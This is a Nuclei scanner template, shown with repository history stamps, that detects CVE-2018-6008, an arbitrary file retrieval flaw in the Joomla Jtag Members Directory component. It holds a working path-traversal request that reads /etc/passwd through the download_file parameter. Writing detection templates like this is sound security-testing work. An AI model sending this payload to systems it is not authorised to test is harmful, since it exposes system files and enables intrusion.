nuclei-templates/cves/2018/CVE-2018-6008.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2021-08-23 00:03:54 +00:00
id: CVE-2018-6008
info:
name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Retrieval
2021-08-23 00:03:54 +00:00
author: daffainfo
severity: high
description: Arbitrary file retrieval exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
2021-08-23 09:50:53 +00:00
reference:
2021-08-23 00:03:54 +00:00
- https://www.exploit-db.com/exploits/43913
- https://www.cvedetails.com/cve/CVE-2018-6008
- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
- https://www.exploit-db.com/exploits/43913/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-6008
cwe-id: CWE-200
tags: cve,cve2018,joomla,lfi
2021-08-23 00:03:54 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-08-23 00:03:54 +00:00
- type: status
status:
- 200